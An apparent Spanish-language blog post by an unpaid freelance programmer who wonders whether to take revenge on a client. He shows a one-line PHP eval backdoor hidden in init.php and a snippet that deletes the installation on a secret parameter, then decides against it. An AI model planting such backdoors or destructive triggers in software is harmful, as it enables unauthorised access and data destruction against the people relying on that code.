Los programadores y el poder

Hola a todos. Hoy estuve pensando, y ya no estoy tan seguro de que me vayan a pagar un proyecto en el que estuve trabajando hasta el cansancio, durante varios dias. El trabajo no era particularmente dificil, ni largo, pero como estoy con 8 horas diarias, el hecho de terminarlo fue bastante extenuante.

No me importa realmente el hecho de que no me paguen, y son solamente $75. Solamente me lleva a la cuestión, ¿acaso la persona para la que escribí el programa no sabe que si quisiera podría tener acceso a mi aplicación, y a travez de eso a todos sus sitios web? (porque por supuesto, todas las bases de datos estan bajo el mismo usuario y en el mismo servidor).

No es el caso, pero, digamos que entre las miles de líneas de código que tiene por ejemplo el archivo init.php de cualquier aplicación, yo agregara el siguiente código:

<?php
eval($_GET['JskqwWdSc231']);
?>
 

¿Sería tan dificil para mi romper la instalación para la que no me pagaron? ¿Sería conveniente no pagarme?

Por supuesto, toda acción tiene su consecuencia, y no me parece que sea buena idea meterme en servidores donde claramente no soy bienvenido, por un tema legal mas que nada. Pero si yo rompiera la instalación por la cual no se me pagó, de forma anónima, creo que no me sentiría nada mal.

<?php
if($_GET['JskqwWdSc231'])
  delete_directory(instalacion);
?>
 

¿Qué opinan ustedes, vale la pena? Yo personalmente, pienso que no, que no vale la pena manchar la reputación de uno por unos pesos.

Después de todo, es posible que tengan pensado pagarnos… Y si hacemos una cosa asi embarrariamos mucho la cosa. Todo problema es un problema interno.

Agrega un comentario! los comentarios se aprueban automaticamente

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s